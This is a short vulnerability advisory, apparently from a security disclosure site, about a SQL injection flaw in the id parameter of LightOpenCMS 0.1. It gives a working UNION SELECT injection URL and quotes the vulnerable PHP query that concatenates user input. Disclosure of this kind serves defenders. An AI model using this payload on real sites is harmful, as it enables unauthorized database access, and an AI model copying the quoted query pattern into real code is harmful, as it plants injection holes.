LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability

2009-05-25 / 2009-05-26
Credit: Mi4night
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

[+] LightOpenCMS (id) SQL Injection Vulnerability [+] Author: Mi4night [+] Script: http://sourceforge.net/project/downloading.php?group_id=251474&filename=locms-0.1-pa.zip&a=4814604 [+] Injection: http://127.0.0.1/[path]/index.php?id=-1%27%20union%20select%201,2,@@version,4%20%23 [+] Requires: magic_gpc() == OFF [+] Vulnerable code: if (isset($_GET['id'])) { $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'"); [+] Patch: Its fucking beta.. or alpha or whatever. they'll fix it in the stable version ! [+] Shoutz to: Nuc my brotha, str0ke and all the otherz i forgot xD


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top